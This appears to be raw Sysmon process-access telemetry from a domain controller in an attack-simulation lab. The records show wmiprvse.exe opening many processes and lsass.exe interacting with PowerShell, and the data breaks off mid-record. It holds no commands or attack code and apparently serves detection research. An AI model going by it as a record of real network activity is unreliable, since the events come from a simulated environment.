10341000x80000000000000002238397Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AC86-00000000AD01}7952C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238396Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.217{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-649E-603D-AB86-00000000AD01}5896C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238395Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F281-00000000AD01}2992C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238394Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-4090-603D-F181-00000000AD01}1592C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238393Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB2E-603C-9079-00000000AD01}4328C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238392Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238391Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB20-603C-5D79-00000000AD01}1652C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238390Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238389Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7A5F-6039-4410-00000000AD01}2140C:\Windows\System32\rundll32.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238388Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7949-6039-1B10-00000000AD01}5344C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238387Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7948-6039-1A10-00000000AD01}4808C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238386Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1910-00000000AD01}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238385Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7947-6039-1810-00000000AD01}4892C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238384Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\lsasrv.dll+25d17|C:\Windows\system32\lsasrv.dll+26ded|C:\Windows\system32\lsasrv.dll+25b95|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238383Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-229D-6039-0B00-00000000AD01}85216356C:\Windows\system32\lsass.exe{05ADC7E1-6D98-603E-93AA-00000000AD01}13748C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\system32\lsasrv.dll+25add|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002238382Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-7946-6039-1610-00000000AD01}3144C:\Program Files\Mozilla Firefox\firefox.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238381Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238380Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238379Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002238378Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002238377Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:44.201{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 